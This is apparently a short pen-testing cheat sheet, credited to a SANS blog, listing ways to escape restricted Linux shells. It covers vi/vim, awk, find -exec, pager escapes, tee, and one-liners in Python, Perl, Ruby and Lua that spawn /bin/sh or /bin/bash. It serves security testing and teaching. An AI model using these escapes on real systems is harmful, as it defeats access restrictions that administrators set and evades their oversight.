Escaping Restricted Linux Shells

From vi or vim

:set shell=/bin/bash

Next, type and execute:

:shell

Another method is to type:

:! /bin/bash

From awk

awk 'BEGIN {system("/bin/sh")}'

From find

find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

From more, less and man

'! /bin/sh'
'!/bin/sh'
'!bash'

From tee

echo "evil script code" | tee script.sh

From your fav language try following

python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
irb(main:001:0> exec "/bin/sh"

Source: https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells

Leave a Reply

Your email address will not be published. Required fields are marked *